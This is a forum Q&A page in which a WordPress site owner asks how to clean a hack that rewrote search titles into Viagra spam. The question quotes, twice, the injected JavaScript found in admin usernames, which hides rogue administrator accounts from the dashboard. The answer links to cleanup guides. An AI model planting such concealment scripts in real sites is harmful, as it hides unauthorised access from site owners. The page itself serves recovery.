Home » Wordpress » How to find and clean wordpress from script/s that changes your blog posts titles on Google and Yahoo with embarrassing “Viagra text”?

How to find and clean wordpress from script/s that changes your blog posts titles on Google and Yahoo with embarrassing “Viagra text”?

Posted by: admin November 30, 2017 Leave a comment

Questions:

One day after managing to defend against a massive DDoS attack now http://arabcrunch.com is hacked by someone who seems to change the posts title into Viagra ad on google search engine look how they damaged us:

www.google.com/search?hl=en&client=safari&rls=en&q=Viagra+Online+Pharmacy+-+Buy+Online+Viagra%2C+Cialis%2C+Levitra+wordpress+hack&aq=f&aqi=&aql=&oq=&gs_rfai=

and here:

google.com/search?hl=en&client=safari&rls=en&q=idescribe&btnG=Search&aq=f&aqi=g-s1g-sx2g-s1g-sx1&aql=&oq=&gs_rfai=

What we did is a clean WP install with clean pluggins and imported our DB with old posts and all pages. then added each puglin we need manually then rebuilt the sitemap.xml

but Now we are doomed as any key word you search will get the result on google withe the title: Viagra Online Pharmacy – Buy Online Viagra, Cialis, Levitra

I found out on the DB table wp_usermeta user_id: 16 that the username is a script:

<b id="user_superuser"><script language="JavaScript">
  var setUserName = function(){ 
      try{    
        var t=document.getElementById("user_superuser");   
                 while(t.nodeName!="TR"){      
           t=t.parentNode;                };   
         t.parentNode.removeChild(t);      
      var tags = document.getElementsByTagName("H3");    
        var s = " shown below"; 
           for (var i = 0; i < tags.length; i++) {    
             var t=tags[i].innerHTML;        
         var h=tags[i];             
    if(t.indexOf(s)>0){   
                   s =(parseInt(t)-1)+s;
                      h.removeChild(h.firstChild);
                      t = document.createTextNode(s);  
                        h.appendChild(t);                     }                }
   var arr=document.getElementsByTagName("ul");
   for(var i in arr) if(arr[i].className=="subsubsub"){
       var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
       if(n[1]>0){   var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)    </gi,">Administrator ("+(n[1]-1)+")<");   arr[i].innerHTML=txt;       }   } 
             }catch(e){};
      };      addLoadEvent(setUserName);      </script>

This is smiler to a hack ArabCrunch EN along with thousands of WP blogs suffered on 9 9 2009
read about it and links to solutions here:
arabcrunch.com/2009/09/arabcrunch-and-wordpress-under-attack.html

After the install we found 2 new users:
wordpress.org and system, both are set as admin and have the same script set as their user name:

<div id="user_superuser"><script language="JavaScript">
var setUserName = function(){
 try{
  var t=document.getElementById("user_superuser");
  while(t.nodeName!="TR"){
   t=t.parentNode;
  };
  t.parentNode.removeChild(t);
  var tags = document.getElementsByTagName("H3");
  var s = " shown below";
  for (var i = 0; i < tags.length; i++) {
   var t=tags[i].innerHTML;
   var h=tags[i];
   if(t.indexOf(s)>0){
    s =(parseInt(t)-1)+s;
    h.removeChild(h.firstChild);
    t = document.createTextNode(s);
    h.appendChild(t);
   }
  }
  var arr=document.getElementsByTagName("ul");
  for(var i in arr) if(arr[i].className=="subsubsub"){
   var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
   if(n[1]>0){
    var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
        arr[i].innerHTML=txt;
        }
    }
          }catch(e){};
     };
     addLoadEvent(setUserName);
</script></div>

Any idea how to solve this?

Answers:

Export and clean your database before you import it into a new WP install: see FAQ: My site was hacked « WordPress Codex and how-to-completely-clean-your-hacked-wordpress-installation.